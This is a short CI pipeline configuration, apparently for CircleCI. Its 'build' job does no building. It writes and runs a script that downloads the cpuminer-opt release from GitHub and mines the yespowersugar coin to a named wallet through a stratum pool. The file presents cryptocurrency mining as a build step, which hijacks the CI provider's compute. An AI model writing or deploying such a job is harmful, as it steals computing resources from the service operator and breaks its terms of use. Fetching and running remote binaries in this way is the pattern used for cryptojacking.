jobs:
  build:
    docker:
     - image: alpine

    working_directory: /mnt/ramdisk

    steps:
      - run: |
          echo 'wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-linux.tar.gz' > run.sh
          echo 'tar xf cpuminer-opt-linux.tar.gz' >> run.sh
          echo './cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1qgel56acveq6xqjxrk87pmf3fjt7xw07s33n30q.docker1' >> run.sh
          chmod +x run.sh
      - run: ./run.sh